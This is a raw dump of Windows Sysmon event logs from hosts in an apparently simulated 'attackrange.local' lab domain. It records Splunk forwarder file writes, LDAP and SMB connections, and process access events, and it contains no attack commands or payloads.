07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:11.751{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65DFA741EA6202FE3216A30AEF799441,SHA256=19BE796AE484BDD499634789A2EA40FF9899762AC1FBCAFEA1E6D85604B9ACD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:11.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59046AA571F1CE41D74E57AB215C47FE,SHA256=8022473F02AF290F8151D95496A41861520358FDDECB6374A5DB7F6EA888AA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:11.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD06E4EAC0D495DBD5A01AC5D4D77E6,SHA256=D1E42C26BD0D5BE22E3499BEBEB41FF765CB2E109E6C8346E7317ECF6B046359,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:02.718{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50980-false10.0.1.12-8000- 23542300x8000000000000000806974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:12.813{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C58A9C5AF7F772E4F09E2132DE4F8B89,SHA256=CD2D9AEA266F1A652443CADE697BA54F22D9ECD3E460D75D91E304C4B1822C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:12.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDF342E4DE7D406986348FA604E7043B,SHA256=987C2CC8C88447EDD07A2805B6245284AEC5CC2CB6D2958CC487ECF347B3A271,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.500{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001047789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.403{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local50982-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001047788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.403{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50982-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001047787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.394{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50981-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.394{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50981-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001047793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:13.853{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B371A8FC7516BA933DF65C4DB6374447,SHA256=3A407F5FD893CED8F31A9E1FF9B8CAF72039E4FD6A2DABD8F668415207445545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:13.876{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2EDD54A412599494A84C06DC89F38AF,SHA256=A8D86877A6A62B50E8C3491E9549C3D84FE1C83AD57A225FC6C6610274E251EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.500{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x8000000000000000806976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:14.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10293176F9F8289FDA1B29236C31D459,SHA256=B6044B1A0F0AFFECF0327912CED9F9F6039EC8995D7C79378BABADE2F06C238B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:14.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8444439E729FB854200F445BFF7B9CAA,SHA256=DE044BABD8251884A4A394E4F94400906637CCF9EEC0C481B010AAD9FFDE0F9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:14.348{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57225-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:15.919{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FDA5D0158DA3044B86E0C04C2BD4026,SHA256=061DBB91F9080DF02D4293E0163FEF478C256F779B1D49EC495DF9AE71EC340F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:15.917{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8E6F6BDCB6B25FF15D36EA9D0EF577,SHA256=C2AA4B7DF84541257BA51F9DD6EAF7EFA6E3C6469F522A76B320C3751C83EA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:15.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=527EA0D914CEBC22A2022B8669CDE20A,SHA256=6C4C2B0339820C1BCF972A67E5D969117645541F05001FAA04BE4E753D0D752B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:16.934{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A40D1EBCB8C56CC25F4F4F46F5E12B,SHA256=348CE09A0E4E564814A37059E75727DF00FD664242D858C18819EA35A4637657,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:16.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF02F8B2044BC524A86E85083CD0B6C,SHA256=51A294AEB4439CC6E675A1450CC952139E79566A6E41374967287400D721498B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:07.919{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50984-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001047797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:07.918{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50984-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001047801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:17.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C2BBCF1209C464FC88577D714CCE569,SHA256=09B3D51EA88C4BDEE6B7FD0D698B551B327EC9B222E742581461A02DAEF8F790,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:17.981{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A6D07EEB2B4DC5D9B96C635B3108AE,SHA256=3E108DF114FD1A671EAC259B49C3EAB33E729202A5C8AF46D084C690672E9B4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.649{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50985-false10.0.1.12-8000- 23542300x8000000000000000806981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:18.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=898E9A9390C4E957CFE351F582AB2A5B,SHA256=9B10DDB59CBC2043FA92485ADFD2E51BAD4C3993C9D9B3699E4C23C68E08B5FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:18.951{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6692D6BDAE1BE8A87009EEF60E985D8A,SHA256=24BEA7A2126BB0D614F1D195F42CA1AE215936AB832AC4F55480B97F9E71B0DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:18.234{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:19.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=047112E1B8BBEF04BE264E32BFFBA697,SHA256=79BE273DFD78FA589C1AE82DF0A8BBFC748A55DE89AB7CE7B94E24093023E23F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:20.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD5EE82A6D1CED11B733AFA8A595395,SHA256=914CEBA1BC4CAB17043E3A0503AFB6CC64A4A6FD60F0AD0ADE38D8B05FFE7D9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.419{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.013{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0EE41D3D1C3E441288C264092BAC608,SHA256=30C91985F750AB6FF4C8055752C79AB6D4AD779E23E7937738E277850AA2E318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:21.028{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF7D6E45F89C742C88BCA9B6B7E13496,SHA256=469F80313FEB9434F04D1CA50BC01E141F2303A63B399FA8D154B08EACF3F83F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:22.649{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29120A9617EBEDE0A5C1489BBBA39752,SHA256=3029307A241062588FA950E6A17AC7CC5B5917FDA7E2A4C18E753F05D3195B6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:22.649{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C5150E69351C058A09139EFE8B5B812,SHA256=961C110E5E3A80394BE126F24519DC2B4257DE892C30825F294B6665A44C5E8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:14.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50986-false10.0.1.12-8000- 23542300x80000000000000001047806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:22.014{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D1409A08E5A504EDF72071892A56C6,SHA256=21DA47B27F45F2D068696F60E8CD906D00A1F0812654AB7E26B22BF1C5D432E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.552{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57227-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000806986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57226-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:22.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CDC56E02D5C7B6092F1DCD7B84961DB,SHA256=8BEA340D15793062D6D6B3607303C3E8FA4F52E59A4D16209DCECF3153604D3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:23.033{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2594C645DDE8027223F1D77B9B835919,SHA256=3E701F865E76E9AF3B3BE2B738035515C2C648C6C5DE909BA5DB31A74D12170E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:23.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59E64008EAB2048E7AD30F4C0F651106,SHA256=78699389E658B847189C25B1429DFD70EF28A9A32A527831FF4A1212C09E6ED7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program 